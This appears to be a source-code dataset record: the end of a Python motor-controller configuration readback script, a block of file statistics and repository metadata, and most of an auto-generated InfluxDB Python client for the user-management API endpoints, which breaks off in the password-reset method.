        # a duplicated read present in the original command sequence.
        attributes = (
            "config.dc_bus_undervoltage_trip_level",
            "config.dc_bus_overvoltage_trip_level",
            "axis1.motor.config.pre_calibrated",
            "axis1.motor.config.pole_pairs",
            "axis1.motor.config.calibration_current",
            "axis1.motor.config.resistance_calib_max_voltage",
            "axis1.motor.config.phase_inductance",
            "axis1.motor.config.phase_resistance",
            "axis1.motor.config.current_lim",
            "axis1.motor.config.current_lim_margin",
            "axis1.motor.config.requested_current_range",
            "axis1.motor.config.current_control_bandwidth",
            "axis1.controller.config.control_mode",
            "axis1.controller.config.pos_gain",
            "axis1.controller.config.vel_gain",
            "axis1.controller.config.vel_integrator_gain",
            "axis1.controller.config.vel_limit",
            "axis1.controller.config.vel_limit_tolerance",
            "axis1.controller.config.vel_limit",
            "axis1.controller.config.vel_ramp_enable",
            "axis1.controller.config.vel_ramp_rate",
            "axis1.encoder.config.cpr",
            "axis1.trap_traj.config.vel_limit",
            "axis1.trap_traj.config.accel_limit",
            "axis1.trap_traj.config.decel_limit",
            "axis1.trap_traj.config.A_per_css",
        )
        for server_ip in Server_IP_list:
            for attribute in attributes:
                aios.passthrough(server_ip, "r " + attribute + "\n")
            print('\n')
# Run the configuration readback only when executed as a script,
# not when imported as a module.
if __name__ == '__main__':
    main()
| 59.25
| 123
| 0.695627
| 777
| 5,214
| 4.401544
| 0.120978
| 0.128655
| 0.192982
| 0.336257
| 0.920175
| 0.882164
| 0.813158
| 0.794444
| 0.794444
| 0.783626
| 0
| 0.0513
| 0.173763
| 5,214
| 87
| 124
| 59.931034
| 0.742572
| 0.434983
| 0
| 0.052632
| 0
| 0
| 0.36074
| 0.335389
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0.684211
| 0.105263
| 0
| 0.131579
| 0.026316
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
814f95db6ab9d745cda146f141e688e5dcb1d7d0
| 41,096
|
py
|
Python
|
influxdb_client/service/users_service.py
|
mmatl/influxdb-client-python
|
7461297c153ef1401c861992a8886bee1ec4ce4d
|
[
"MIT"
] | null | null | null |
influxdb_client/service/users_service.py
|
mmatl/influxdb-client-python
|
7461297c153ef1401c861992a8886bee1ec4ce4d
|
[
"MIT"
] | null | null | null |
influxdb_client/service/users_service.py
|
mmatl/influxdb-client-python
|
7461297c153ef1401c861992a8886bee1ec4ce4d
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
InfluxDB OSS API Service.
The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
class UsersService(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None): # noqa: E501,D401,D403
"""UsersService - a operation defined in OpenAPI."""
if api_client is None:
raise ValueError("Invalid value for `api_client`, must be defined.")
self.api_client = api_client
def delete_users_id(self, user_id, **kwargs): # noqa: E501,D401,D403
"""Delete a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_users_id(user_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The ID of the user to delete. (required)
:param str zap_trace_span: OpenTracing span context
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_users_id_with_http_info(user_id, **kwargs) # noqa: E501
else:
(data) = self.delete_users_id_with_http_info(user_id, **kwargs) # noqa: E501
return data
    def delete_users_id_with_http_info(self, user_id, **kwargs):  # noqa: E501,D401,D403
        """Delete a user.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_users_id_with_http_info(user_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str user_id: The ID of the user to delete. (required)
        :param str zap_trace_span: OpenTracing span context
        :return: None
        If the method is called asynchronously,
        returns the request thread.
        """  # noqa: E501
        # locals() must be captured first: it snapshots exactly the named
        # parameters plus the raw `kwargs` dict, before any other local
        # variable is created. Do not rename locals in this method.
        local_var_params = locals()
        all_params = ['user_id', 'zap_trace_span']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments, then flatten the accepted
        # ones into local_var_params.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_users_id" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'user_id' is set
        if ('user_id' not in local_var_params or
                local_var_params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `delete_users_id`")  # noqa: E501
        collection_formats = {}
        # `userID` is substituted into the /api/v2/users/{userID} path.
        path_params = {}
        if 'user_id' in local_var_params:
            path_params['userID'] = local_var_params['user_id']  # noqa: E501
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        # urlopen optional setting
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/users/{userID}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def get_flags(self, **kwargs): # noqa: E501,D401,D403
"""Return the feature flags for the currently authenticated user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flags(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_flags_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_flags_with_http_info(**kwargs) # noqa: E501
return data
    def get_flags_with_http_info(self, **kwargs):  # noqa: E501,D401,D403
        """Return the feature flags for the currently authenticated user.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_flags_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str zap_trace_span: OpenTracing span context
        :return: dict(str, object)
        If the method is called asynchronously,
        returns the request thread.
        """  # noqa: E501
        # locals() must be captured first: it snapshots exactly the named
        # parameters plus the raw `kwargs` dict. Do not rename locals.
        local_var_params = locals()
        all_params = ['zap_trace_span']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments, then flatten the accepted
        # ones into local_var_params.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_flags" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        # urlopen optional setting
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/flags', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='dict(str, object)',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def get_me(self, **kwargs): # noqa: E501,D401,D403
"""Retrieve the currently authenticated user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_me(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_me_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_me_with_http_info(**kwargs) # noqa: E501
return data
    def get_me_with_http_info(self, **kwargs):  # noqa: E501,D401,D403
        """Retrieve the currently authenticated user.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_me_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str zap_trace_span: OpenTracing span context
        :return: UserResponse
        If the method is called asynchronously,
        returns the request thread.
        """  # noqa: E501
        # locals() must be captured first: it snapshots exactly the named
        # parameters plus the raw `kwargs` dict. Do not rename locals.
        local_var_params = locals()
        all_params = ['zap_trace_span']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments, then flatten the accepted
        # ones into local_var_params.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_me" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        # urlopen optional setting
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/me', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def get_users(self, **kwargs): # noqa: E501,D401,D403
"""List all users.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:param int offset:
:param int limit:
:param str after: Resource ID to seek from. Results are not inclusive of this ID. Use `after` instead of `offset`.
:param str name:
:param str id:
:return: Users
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_users_with_http_info(**kwargs) # noqa: E501
return data
    def get_users_with_http_info(self, **kwargs):  # noqa: E501,D401,D403
        """List all users.

        Low-level variant of ``get_users``: returns the full response
        (data, status, headers) unless ``_return_http_data_only`` is set.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_users_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str zap_trace_span: OpenTracing span context
        :param int offset:
        :param int limit:
        :param str after: Resource ID to seek from. Results are not inclusive of this ID. Use `after` instead of `offset`.
        :param str name:
        :param str id:
        :return: Users
                 If the method is called asynchronously,
                 returns the request thread.
        """  # noqa: E501
        # Snapshot of the local frame, taken while it holds only ``self`` and
        # the raw ``kwargs`` dict; accepted keywords are merged into it below.
        local_var_params = locals()
        # Endpoint-specific parameters, then framework-level options shared by
        # every generated wrapper.
        all_params = ['zap_trace_span', 'offset', 'limit', 'after', 'name', 'id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments early; fold known ones into the
        # locals snapshot so downstream code can look them up uniformly.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_users" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # Client-side range checks mirroring the OpenAPI schema:
        # offset >= 0 and 1 <= limit <= 100.
        if 'offset' in local_var_params and local_var_params['offset'] < 0:  # noqa: E501
            raise ValueError("Invalid value for parameter `offset` when calling `get_users`, must be a value greater than or equal to `0`")  # noqa: E501
        if 'limit' in local_var_params and local_var_params['limit'] > 100:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `get_users`, must be a value less than or equal to `100`")  # noqa: E501
        if 'limit' in local_var_params and local_var_params['limit'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `get_users`, must be a value greater than or equal to `1`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        # Only supplied query parameters are sent; insertion order below fixes
        # their order in the request URL.
        query_params = []
        if 'offset' in local_var_params:
            query_params.append(('offset', local_var_params['offset']))  # noqa: E501
        if 'limit' in local_var_params:
            query_params.append(('limit', local_var_params['limit']))  # noqa: E501
        if 'after' in local_var_params:
            query_params.append(('after', local_var_params['after']))  # noqa: E501
        if 'name' in local_var_params:
            query_params.append(('name', local_var_params['name']))  # noqa: E501
        if 'id' in local_var_params:
            query_params.append(('id', local_var_params['id']))  # noqa: E501
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        # urlopen optional setting; read from the untouched original kwargs
        # (only the locals snapshot was mutated above).
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/users', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Users',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def get_users_id(self, user_id, **kwargs): # noqa: E501,D401,D403
"""Retrieve a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_id(user_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The user ID. (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_users_id_with_http_info(user_id, **kwargs) # noqa: E501
else:
(data) = self.get_users_id_with_http_info(user_id, **kwargs) # noqa: E501
return data
    def get_users_id_with_http_info(self, user_id, **kwargs):  # noqa: E501,D401,D403
        """Retrieve a user.

        Low-level variant of ``get_users_id``: returns the full response
        (data, status, headers) unless ``_return_http_data_only`` is set.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_users_id_with_http_info(user_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str user_id: The user ID. (required)
        :param str zap_trace_span: OpenTracing span context
        :return: UserResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """  # noqa: E501
        # Snapshot of the local frame, taken while it holds only ``self``,
        # ``user_id`` and the raw ``kwargs`` dict; accepted keywords are
        # merged into it below.
        local_var_params = locals()
        # Endpoint-specific parameters, then framework-level options shared by
        # every generated wrapper.
        all_params = ['user_id', 'zap_trace_span']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments early; fold known ones into the
        # locals snapshot so downstream code can look them up uniformly.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_users_id" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'user_id' is set
        if ('user_id' not in local_var_params or
                local_var_params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `get_users_id`")  # noqa: E501
        collection_formats = {}
        # 'userID' is the placeholder name in the URL template below.
        path_params = {}
        if 'user_id' in local_var_params:
            path_params['userID'] = local_var_params['user_id']  # noqa: E501
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        # urlopen optional setting; read from the untouched original kwargs
        # (only the locals snapshot was mutated above).
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/users/{userID}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def patch_users_id(self, user_id, user, **kwargs): # noqa: E501,D401,D403
"""Update a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_users_id(user_id, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The ID of the user to update. (required)
:param User user: User update to apply (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_users_id_with_http_info(user_id, user, **kwargs) # noqa: E501
else:
(data) = self.patch_users_id_with_http_info(user_id, user, **kwargs) # noqa: E501
return data
    def patch_users_id_with_http_info(self, user_id, user, **kwargs):  # noqa: E501,D401,D403
        """Update a user.

        Low-level variant of ``patch_users_id``: returns the full response
        (data, status, headers) unless ``_return_http_data_only`` is set.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.patch_users_id_with_http_info(user_id, user, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str user_id: The ID of the user to update. (required)
        :param User user: User update to apply (required)
        :param str zap_trace_span: OpenTracing span context
        :return: UserResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """  # noqa: E501
        # Snapshot of the local frame, taken while it holds only ``self``,
        # ``user_id``, ``user`` and the raw ``kwargs`` dict; accepted
        # keywords are merged into it below.
        local_var_params = locals()
        # Endpoint-specific parameters, then framework-level options shared by
        # every generated wrapper.
        all_params = ['user_id', 'user', 'zap_trace_span']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments early; fold known ones into the
        # locals snapshot so downstream code can look them up uniformly.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_users_id" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'user_id' is set
        if ('user_id' not in local_var_params or
                local_var_params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `patch_users_id`")  # noqa: E501
        # verify the required parameter 'user' is set
        if ('user' not in local_var_params or
                local_var_params['user'] is None):
            raise ValueError("Missing the required parameter `user` when calling `patch_users_id`")  # noqa: E501
        collection_formats = {}
        # 'userID' is the placeholder name in the URL template below.
        path_params = {}
        if 'user_id' in local_var_params:
            path_params['userID'] = local_var_params['user_id']  # noqa: E501
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        form_params = []
        local_var_files = {}
        # The User model is sent as the JSON request body.
        body_params = None
        if 'user' in local_var_params:
            body_params = local_var_params['user']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        # urlopen optional setting; read from the untouched original kwargs
        # (only the locals snapshot was mutated above).
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/users/{userID}', 'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def post_users(self, user, **kwargs): # noqa: E501,D401,D403
"""Create a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_users(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param User user: User to create (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_users_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.post_users_with_http_info(user, **kwargs) # noqa: E501
return data
    def post_users_with_http_info(self, user, **kwargs):  # noqa: E501,D401,D403
        """Create a user.

        Low-level variant of ``post_users``: returns the full response
        (data, status, headers) unless ``_return_http_data_only`` is set.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_users_with_http_info(user, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param User user: User to create (required)
        :param str zap_trace_span: OpenTracing span context
        :return: UserResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """  # noqa: E501
        # Snapshot of the local frame, taken while it holds only ``self``,
        # ``user`` and the raw ``kwargs`` dict; accepted keywords are merged
        # into it below.
        local_var_params = locals()
        # Endpoint-specific parameters, then framework-level options shared by
        # every generated wrapper.
        all_params = ['user', 'zap_trace_span']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments early; fold known ones into the
        # locals snapshot so downstream code can look them up uniformly.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_users" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'user' is set
        if ('user' not in local_var_params or
                local_var_params['user'] is None):
            raise ValueError("Missing the required parameter `user` when calling `post_users`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        form_params = []
        local_var_files = {}
        # The User model is sent as the JSON request body.
        body_params = None
        if 'user' in local_var_params:
            body_params = local_var_params['user']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        # urlopen optional setting; read from the untouched original kwargs
        # (only the locals snapshot was mutated above).
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/users', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def post_users_id_password(self, user_id, password_reset_body, **kwargs): # noqa: E501,D401,D403
"""Update a password.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_users_id_password(user_id, password_reset_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The user ID. (required)
:param PasswordResetBody password_reset_body: New password (required)
:param str zap_trace_span: OpenTracing span context
:param str authorization: An auth credential for the Basic scheme
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_users_id_password_with_http_info(user_id, password_reset_body, **kwargs) # noqa: E501
else:
(data) = self.post_users_id_password_with_http_info(user_id, password_reset_body, **kwargs) # noqa: E501
return data
    def post_users_id_password_with_http_info(self, user_id, password_reset_body, **kwargs):  # noqa: E501,D401,D403
        """Update a password.

        Low-level variant of ``post_users_id_password``: returns the full
        response (data, status, headers) unless ``_return_http_data_only``
        is set.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_users_id_password_with_http_info(user_id, password_reset_body, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str user_id: The user ID. (required)
        :param PasswordResetBody password_reset_body: New password (required)
        :param str zap_trace_span: OpenTracing span context
        :param str authorization: An auth credential for the Basic scheme
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """  # noqa: E501
        # Snapshot of the local frame, taken while it holds only ``self``,
        # ``user_id``, ``password_reset_body`` and the raw ``kwargs`` dict;
        # accepted keywords are merged into it below.
        local_var_params = locals()
        # Endpoint-specific parameters, then framework-level options shared by
        # every generated wrapper.
        all_params = ['user_id', 'password_reset_body', 'zap_trace_span', 'authorization']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments early; fold known ones into the
        # locals snapshot so downstream code can look them up uniformly.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_users_id_password" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'user_id' is set
        if ('user_id' not in local_var_params or
                local_var_params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `post_users_id_password`")  # noqa: E501
        # verify the required parameter 'password_reset_body' is set
        if ('password_reset_body' not in local_var_params or
                local_var_params['password_reset_body'] is None):
            raise ValueError("Missing the required parameter `password_reset_body` when calling `post_users_id_password`")  # noqa: E501
        collection_formats = {}
        # 'userID' is the placeholder name in the URL template below.
        path_params = {}
        if 'user_id' in local_var_params:
            path_params['userID'] = local_var_params['user_id']  # noqa: E501
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        # An explicit Authorization header may override the configured auth.
        if 'authorization' in local_var_params:
            header_params['Authorization'] = local_var_params['authorization']  # noqa: E501
        form_params = []
        local_var_files = {}
        # The PasswordResetBody model is sent as the JSON request body.
        body_params = None
        if 'password_reset_body' in local_var_params:
            body_params = local_var_params['password_reset_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
